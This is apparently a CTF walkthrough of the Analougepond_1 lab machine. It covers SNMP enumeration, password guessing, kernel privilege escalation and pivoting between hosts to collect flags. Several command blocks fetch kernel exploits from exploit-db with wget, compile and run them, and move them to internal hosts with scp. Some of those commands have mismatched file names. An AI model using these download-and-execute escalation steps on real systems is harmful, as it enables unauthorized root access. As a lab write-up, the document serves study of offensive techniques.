Analougepond: 1

Difficulty: Intermediate

Posted by Admin on March 16, 2020

CTF link

Good day, today I will Walkthrough Analougepond_1 from knightmare. In order to consider a machine rooted, I need to have the following:

  • Troll Flag
  • Flag 1
  • Flag 2
  • Have root everywhere
  • User passwords
  • 2 VNC passwords

    • Scan

    When nmap finished scanning, I saw an interesting 161 snmp port. Now proceed to enumeration.

    nmap -sU 192.168.2.100

    With snmp-check, I see that the assumed username is "eric" and "There is a house in New Orleans they call it ..."

    After googling, I find out that the answer to the question was "therisingsun" and now I have a username and password

    snmp-check 192.168.2.100
    eric:therisingsun

    Troll flag and 1th root

    In order to get root, I will use exploit for kernel 3.19.0-25-generic.

    uname -a
    https://www.exploit-db.com/exploits/39166
    wget https://www.exploit-db.com/raw/39166
    mv 39166 exp.c
    gcc exp.c -o exp
    ./exp

    After privilege escalation, I go to the root folder and find the troll flag.

    VNC passwords

    By default, passwords from vnc are stored in the /etc/libvirt folder. In the /quemu folder, I see two xml files in them and there are passwords.

    With grep, I find out what passwords are in the files

    barringsbank.xml:memphistennessee
    puppet.xml:sendyoubacktowalker

    Based on the file names, we can assume that these are hosts, but where can I find them?

    Way to the puppet

    In the file /etc/hosts I found the hosts that called the files with passwords from vnc.

    When connecting to host 192.168.122.2, I see a message that may help me in getting the user.

    From the text we understand that the username is "sandieshaw".Turning to google again. The most famous sandieshaw song is Puppet On A String (https://www.youtube.com/watch?v=uQQtKqF30a8). then we remove the spaces, replace the uppercase letters with lowercase and get the password.

    sandieshaw:puppetonastring

    2th root and 1th flag

    Here we will again apply kernel exploit. This time to kernel version 4.4.0-57-generic.n gcc is not installed on the puppet host, so you will have to compile the exploit on analoguepond and move it using scp.

    wget https://www.exploit-db.com/raw/43418
    mv 43418 exp2.c
    gcc exp2.c -o exp
    scp exp2 sandieshaw@192.168.122.2:/tmp
    chmod +x exp2
    ./tmp

    Тow I can start searching for the flag.

    In the /root folder I find three files: melvin, jim and flag1.txt.0xff. The flag file is hex but when translating it to ascii i got base64 mirrored, after i mirrored base64 and converted to ascii i got the following

    https://www.youtube.com/watch?v=GfJJk7i0NTk If this doesn't work, watch Wargames from 23 minutes in, you might find a password there or something...

    I also found a hidden folder "I_have_you_now" in the final path of which I found two files: my_world_you_are_persistent_try and nlesson_key.gpg

    my_world_you_are_persistent_try:joshua

    The nlesson_key file is encrypted using gpg and I need to find the key. Now I understand what the clue was with the mister potato head. After watching the video from the flag, I realized that the key is the word "secret", backdoors are not a SECRETS.

    gpg nlesson_key

    After decrypting the nlesson_key.gpg file, I received the ssh private authorization key. By the name of the file you can guess that the user name is nlesson

    Way to the barringsbank

    During the connection using the authorization key, I entered passsphrase from the my_world_you_are_persistent_try "joshua" file and connected to the nlesson user

    3th root and 2th flag

    Exploit from the second host is suitable for rooting the last host since the kernel version is the same for them, so again we turn to scp.

    In order to start the exploit I download it on the host 192.168.2.101 then using scp I send the compiled exploit to the host 192.168.122.2 and then to the host 192.168.122.3

    wget https://www.exploit-db.com/exploits/43418
    mv 43418 2exp.c
    gcc 2exp.c -o 2exp
    scp 2exp sandieshaw@192.168.122.2:/tmp
    scp -i /root/.ssh/nleeson_key expoit nlesson@192.168.122.3:/home/nleeson/
    cd /tmp
    ./exp2

    In the root user directory, I did not find anything other than the "me.jpeg" picture and after about fifteen minutes I realized that the flag is in the picture. In order to get it from there I will use steghide. I will resort to scp again to deliver the picture to my kali or you can convert it to base64 then copy, transfer to another file in kali and convert file to the the picture.

    passphrase will be the name of the file that I constantly found in users' directories "reticulatingsplines"

    reticulatingsplines

    And this is hex again. in order to decrypt the file I translate hex to ascii and get mirrored base64 then I mirror base64 convert it to a file and decrypt to ascii

    that's all, thanks knightmare it was a very interesting and fascinating machine